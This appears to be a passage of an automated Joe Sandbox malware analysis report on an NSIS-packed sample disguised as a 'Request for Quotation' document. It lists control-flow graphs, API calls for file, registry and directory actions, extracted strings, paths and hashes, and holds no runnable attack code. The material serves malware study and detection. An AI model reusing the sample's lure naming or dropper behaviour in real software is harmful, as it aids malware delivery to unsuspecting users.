                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                  • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                  • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                                  • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                  • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 412 402dbc-402e0a GetTickCount GetModuleFileNameW call 405b56 415 402e16-402e44 call 405eea call 405981 call 405eea GetFileSize 412->415 416 402e0c-402e11 412->416 424 402f34-402f42 call 402d1a 415->424 425 402e4a-402e61 415->425 417 40305b-40305f 416->417 431 403013-403018 424->431 432 402f48-402f4b 424->432 426 402e63 425->426 427 402e65-402e72 call 4032f9 425->427 426->427 436 402e78-402e7e 427->436 437 402fcf-402fd7 call 402d1a 427->437 431->417 434 402f77-402fc3 GlobalAlloc call 406370 call 405b85 CreateFileW 432->434 435 402f4d-402f65 call 40330f call 4032f9 432->435 462 402fc5-402fca 434->462 463 402fd9-403009 call 40330f call 403062 434->463 435->431 460 402f6b-402f71 435->460 440 402e80-402e98 call 405b11 436->440 441 402efe-402f02 436->441 437->431 445 402f0b-402f11 440->445 459 402e9a-402ea1 440->459 444 402f04-402f0a call 402d1a 441->444 441->445 444->445 451 402f13-402f21 call 406302 445->451 452 402f24-402f2e 445->452 451->452 452->424 452->425 459->445 464 402ea3-402eaa 459->464 460->431 460->434 462->417 472 40300e-403011 463->472 464->445 466 402eac-402eb3 464->466 466->445 468 402eb5-402ebc 466->468 468->445 470 402ebe-402ede 468->470 470->431 471 402ee4-402ee8 470->471 473 402ef0-402ef8 471->473 474 402eea-402eee 471->474 472->431 475 40301a-40302b 472->475 473->445 476 402efa-402efc 473->476 474->424 474->473 477 403033-403038 475->477 478 40302d 475->478 476->445 479 403039-40303f 477->479 478->477 479->479 480 403041-403059 call 405b11 479->480 480->417
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,00000400), ref: 00402DEC
                                                                                                                                    • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                    • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,80000000,00000003), ref: 00402E35
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC9, 00402F94
                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                                  • Error launching installer, xrefs: 00402E0C
                                                                                                                                  • soft, xrefs: 00402EAC
                                                                                                                                  • C:\Users\user\Desktop, xrefs: 00402E17, 00402E1C, 00402E22
                                                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                                  • Null, xrefs: 00402EB5
                                                                                                                                  • Inst, xrefs: 00402EA3
                                                                                                                                  • C:\Users\user\Desktop\Request for Quotation New collaboration.exe, xrefs: 00402DD6, 00402DE5, 00402DF9, 00402E16
                                                                                                                                  • "C:\Users\user\Desktop\Request for Quotation New collaboration.exe", xrefs: 00402DC5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Request for Quotation New collaboration.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Request for Quotation New collaboration.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 2803837635-3007363249
                                                                                                                                  • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                  • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                                  • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                  • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 609 401752-401777 call 402b3a call 4059ac 614 401781-401793 call 405eea call 405935 lstrcatW 609->614 615 401779-40177f call 405eea 609->615 620 401798-401799 call 40617e 614->620 615->620 624 40179e-4017a2 620->624 625 4017a4-4017ae call 40622d 624->625 626 4017d5-4017d8 624->626 633 4017c0-4017d2 625->633 634 4017b0-4017be CompareFileTime 625->634 627 4017e0-4017fc call 405b56 626->627 628 4017da-4017db call 405b31 626->628 636 401870-401899 call 405194 call 403062 627->636 637 4017fe-401801 627->637 628->627 633->626 634->633 649 4018a1-4018ad SetFileTime 636->649 650 40189b-40189f 636->650 638 401852-40185c call 405194 637->638 639 401803-401841 call 405eea * 2 call 405f0c call 405eea call 4056c6 637->639 651 401865-40186b 638->651 639->624 671 401847-401848 639->671 653 4018b3-4018be CloseHandle 649->653 650->649 650->653 654 4029d0 651->654 657 4018c4-4018c7 653->657 658 4029c7-4029ca 653->658 659 4029d2-4029d6 654->659 661 4018c9-4018da call 405f0c lstrcatW 657->661 662 4018dc-4018df call 405f0c 657->662 658->654 668 4018e4-402243 call 4056c6 661->668 662->668 668->659 671->651 673 40184a-40184b 671->673 673->638
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Astrolabe,?,?,00000031), ref: 00401793
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Astrolabe,?,?,00000031), ref: 004017B8
                                                                                                                                    • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nso7880.tmp$C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Astrolabe$Call
                                                                                                                                  • API String ID: 1941528284-4120063866
                                                                                                                                  • Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                                  • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                                  • Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
                                                                                                                                  • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 675 402573-402588 call 402b1d 678 4029c7-4029ca 675->678 679 40258e-402595 675->679 682 4029d0-4029d6 678->682 680 402597 679->680 681 40259a-40259d 679->681 680->681 683 4025a3-4025b2 call 405e4a 681->683 684 4026e6-4026ee 681->684 683->684 688 4025b8 683->688 684->678 689 4025be-4025c2 688->689 690 402657-402667 call 405bd9 689->690 691 4025c8-4025e3 ReadFile 689->691 690->684 696 402669 690->696 691->684 693 4025e9-4025ee 691->693 693->684 695 4025f4-402602 693->695 697 4026a2-4026ae call 405e31 695->697 698 402608-40261a MultiByteToWideChar 695->698 699 40266c-40266f 696->699 697->682 698->696 701 40261c-40261f 698->701 699->697 702 402671-402676 699->702 704 402621-40262c 701->704 706 4026b3-4026b7 702->706 707 402678-40267d 702->707 704->699 705 40262e-402653 SetFilePointer MultiByteToWideChar 704->705 705->704 710 402655 705->710 708 4026d4-4026e0 SetFilePointer 706->708 709 4026b9-4026bd 706->709 707->706 711 40267f-402692 707->711 708->684 712 4026c5-4026d2 709->712 713 4026bf-4026c3 709->713 710->696 711->684 714 402694-40269a 711->714 712->684 713->708 713->712 714->689 715 4026a0 714->715 715->684
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                    • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 1149667376-2366072709
                                                                                                                                  • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                  • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                                  • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                                                                                  • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 716 40317d-4031a6 GetTickCount 717 4032e7-4032ef call 402d1a 716->717 718 4031ac-4031d7 call 40330f SetFilePointer 716->718 723 4032f1-4032f6 717->723 724 4031dc-4031ee 718->724 725 4031f0 724->725 726 4031f2-403200 call 4032f9 724->726 725->726 729 403206-403212 726->729 730 4032d9-4032dc 726->730 731 403218-40321e 729->731 730->723 732 403220-403226 731->732 733 403249-403265 call 406390 731->733 732->733 734 403228-403248 call 402d1a 732->734 739 4032e2 733->739 740 403267-40326f 733->740 734->733 741 4032e4-4032e5 739->741 742 403271-403287 WriteFile 740->742 743 4032a3-4032a9 740->743 741->723 745 403289-40328d 742->745 746 4032de-4032e0 742->746 743->739 744 4032ab-4032ad 743->744 744->739 747 4032af-4032c2 744->747 745->746 748 40328f-40329b 745->748 746->741 747->724 750 4032c8-4032d7 SetFilePointer 747->750 748->731 749 4032a1 748->749 749->747 750->717
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                    • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                                  • WriteFile.KERNELBASE(0040BE78,00412F14,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                                  • SetFilePointer.KERNELBASE(000066F4,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$CountTickWrite
                                                                                                                                  • String ID: x>A
                                                                                                                                  • API String ID: 2146148272-3854404225
                                                                                                                                  • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                  • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                  • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                  • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 751 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 758 4029c7-4029d6 751->758 759 40237d-402385 751->759 761 402387-402394 call 402b3a lstrlenW 759->761 762 402398-40239b 759->762 761->762 763 4023ab-4023ae 762->763 764 40239d-4023aa call 402b1d 762->764 768 4023b0-4023ba call 403062 763->768 769 4023bf-4023d3 RegSetValueExW 763->769 764->763 768->769 773 4023d5 769->773 774 4023d8-4024b2 RegCloseKey 769->774 773->774 774->758 776 402793-40279a 774->776 776->758
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso7880.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso7880.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso7880.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nso7880.tmp
                                                                                                                                  • API String ID: 1356686001-1809235634
                                                                                                                                  • Opcode ID: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                                                                  • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                                  • Opcode Fuzzy Hash: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                                                                  • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 777 4015b9-4015cd call 402b3a call 4059e0 782 401614-401617 777->782 783 4015cf-4015eb call 405962 CreateDirectoryW 777->783 784 401646-402197 call 401423 782->784 785 401619-401638 call 401423 call 405eea SetCurrentDirectoryW 782->785 791 40160a-401612 783->791 792 4015ed-4015f8 GetLastError 783->792 798 4029c7-4029d6 784->798 785->798 800 40163e-401641 785->800 791->782 791->783 795 401607 792->795 796 4015fa-401605 GetFileAttributesW 792->796 795->791 796->791 796->795 800->798
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,76F92EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe"), ref: 004059EE
                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                    • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Astrolabe,?,00000000,000000F0), ref: 00401630
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Astrolabe, xrefs: 00401623
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Astrolabe
                                                                                                                                  • API String ID: 3751793516-4064861044
                                                                                                                                  • Opcode ID: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                                                                  • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                                  • Opcode Fuzzy Hash: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                                                                  • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
